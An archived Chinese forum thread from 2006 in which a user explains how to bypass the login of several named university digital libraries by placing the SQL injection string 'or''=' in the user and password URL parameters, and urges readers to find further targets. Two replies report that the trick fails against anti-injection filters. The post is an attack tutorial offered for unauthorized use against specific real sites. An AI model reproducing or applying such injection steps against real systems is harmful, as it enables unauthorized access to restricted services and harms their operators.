24小时热门版块排行榜    

查看: 477  |  回复: 2
当前主题已经存档。

huihui9467

金虫 (正式写手)

[交流] 利用asp漏洞进超星图书馆

这是在看了论坛上的一个帖子后测试找出来的,特向菜鸟们推荐,
希望对大家有所帮助!
深圳广播电视大学数字图书馆
http://218.17.219.22/bookhtm/index.asp
搜索需要输入用户名、MM
我们可以构造查询条件,突破限制
做法如下:
1.随便输入学号、MM,登陆,例如:学号=1,MM=1.这时会出现“此用户不存在!返回”
ie地址栏中地址为:http://218.17.219.22/bookhtm/sq/ ... ;B1.x=31&B1.y=6

2.修改地址进入:
将上面地址中user=1&mima=1改为:user='or''='&mima='or''='
或者user='orƇ'=Ƈ&mima='orƇ'=Ƈ 也可
即:http://218.17.219.22/bookhtm/sq/load.asp?user='or''='&mima='or''='&B1.x=31&B1.y=6
就是登陆地址了。
3.登陆后可以随便看了
同样的道理利用这个漏洞,可以登陆另外几个需要输入用户名、MM的站点,需要输入的地方都输上'or''='
如:驻马店电大:http://www.zmdtvu.net/dabookhtm/
铜陵电大:http://218.22.180.149/index.asp其他的自己好好发掘吧,
回复此楼

» 猜你喜欢

已阅   回复此楼   关注TA 给TA发消息 送TA红花 TA的回帖

早起的木虫

木虫 (小有名气)

楼主试了没?我试了,行不通!
2楼2006-04-27 22:13:28
已阅   回复此楼   关注TA 给TA发消息 送TA红花 TA的回帖

fox168110

木虫 (著名写手)

不可以
防注入系统提示……
没有用
3楼2006-04-27 22:50:17
已阅   回复此楼   关注TA 给TA发消息 送TA红花 TA的回帖
相关版块跳转 我要订阅楼主 huihui9467 的主题更新
普通表情 高级回复 (可上传附件)
信息提示
请填处理意见